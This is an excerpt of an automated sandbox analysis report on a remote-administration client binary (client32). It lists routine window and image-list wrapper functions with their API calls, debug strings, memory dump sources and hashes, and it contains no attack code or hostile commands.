                                                                                                                                    • API String ID: 819365019-3507600817
                                                                                                                                    • Opcode ID: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
                                                                                                                                    • Instruction ID: 032d4df9316a5e8283d8688c6328372b319042290bc349747f778d43e7cc2059
                                                                                                                                    • Opcode Fuzzy Hash: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
                                                                                                                                    • Instruction Fuzzy Hash: B3E02B75B903287BD3209A81DC46FD7F39CDB04B55F004035F625AA581E6B1F450C794
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11017206
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                                    • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                                                                    • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                                    • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014270 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001202,?,00000000), ref: 1101429F
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014283
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101427E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3507600817
                                                                                                                                    • Opcode ID: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
                                                                                                                                    • Instruction ID: 7bc1a9946e64f754710be5ebc9e77f2b7f227168eeca9689bda6582359b448ca
                                                                                                                                    • Opcode Fuzzy Hash: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
                                                                                                                                    • Instruction Fuzzy Hash: 30E0C275A50328BBD2209691DC46FD6F39C9B04755F008036F625AA181D6B0B8408694
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110147E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000101D,?,00000000), ref: 11014812
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110147F6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110147F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 9bd5d6708678fa6d35662ed678dac9d05df5bbceefec242804b3153e137a2a89
                                                                                                                                    • Instruction ID: 5ee4469d1dc4a955e60a650c955cd8ec1572418a0dd6c560bb7d021c9fa58fea
                                                                                                                                    • Opcode Fuzzy Hash: 9bd5d6708678fa6d35662ed678dac9d05df5bbceefec242804b3153e137a2a89
                                                                                                                                    • Instruction Fuzzy Hash: 7DE02B75A503697BD320D6C1DC46FD7F38C9B05714F004036FA196A580D6B0F440C7A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110146D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001002,?,00000000), ref: 11014702
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110146E6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110146E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 4edbf4975fa7508fd8f438ca7cbc332a27de7735e9af2182db55c994c15b0077
                                                                                                                                    • Instruction ID: dd0a3a0c9e0b73f52a13002e8bb6456b10ff55f947566e0f8916ef05e4261d7d
                                                                                                                                    • Opcode Fuzzy Hash: 4edbf4975fa7508fd8f438ca7cbc332a27de7735e9af2182db55c994c15b0077
                                                                                                                                    • Instruction Fuzzy Hash: 4CE02B75A4032ABBD320D681EC47FD6F38C9B09714F008435FA596A180D6F0F880C795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014860 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000102F,?,00000000), ref: 11014892
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014876
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014871
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: f1adf995de881a2d089194a31c29137ebcd16b167b26e38d0dd2afc25eaac3e8
                                                                                                                                    • Instruction ID: 6c683f8b0539e20cba0793ddc7299e16ef6066829b2ddcb808c332df88c06a0d
                                                                                                                                    • Opcode Fuzzy Hash: f1adf995de881a2d089194a31c29137ebcd16b167b26e38d0dd2afc25eaac3e8
                                                                                                                                    • Instruction Fuzzy Hash: 90E02B75B4036A7BD324D6C1DC46FD6F39CDB05754F004036FA1A6A580D6B1F440C7A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110148A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,00001005,00000000,?), ref: 110148D2
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110148B6
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110148B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 91b58e28c3fc28f96534cbdc6e93cacf09efd4508ecb80f5979a0a770eac5efb
                                                                                                                                    • Instruction ID: 036f5eb1e91b5b39cfc5f78382eaeed4f47a05f9a98aa2e8f530f089e2f38ee1
                                                                                                                                    • Opcode Fuzzy Hash: 91b58e28c3fc28f96534cbdc6e93cacf09efd4508ecb80f5979a0a770eac5efb
                                                                                                                                    • Instruction Fuzzy Hash: 06E02B75A403697BD320D6C1DC46FD6F38C9B05714F004036FA196A580E6B0F540C7B4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11016170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 11016198
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hImageList, xrefs: 11016182
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 1101617D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitIconImageLastList_MessageProcessReplacewsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
                                                                                                                                    • API String ID: 2426217062-4007669474
                                                                                                                                    • Opcode ID: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
                                                                                                                                    • Instruction ID: 8e65b7ad63f8a8bd737c5e548218eb9c2c83e8f30b1cb0f0ee6871e24481aec6
                                                                                                                                    • Opcode Fuzzy Hash: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
                                                                                                                                    • Instruction Fuzzy Hash: B8D02B756402297BC3108A88DC01FD5F38CCF15371F040336F961522C0D9B0A4408B94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11001136
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 1604732272-2830328467
                                                                                                                                    • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                                                    • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                                                                    • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                                                    • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11001016
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
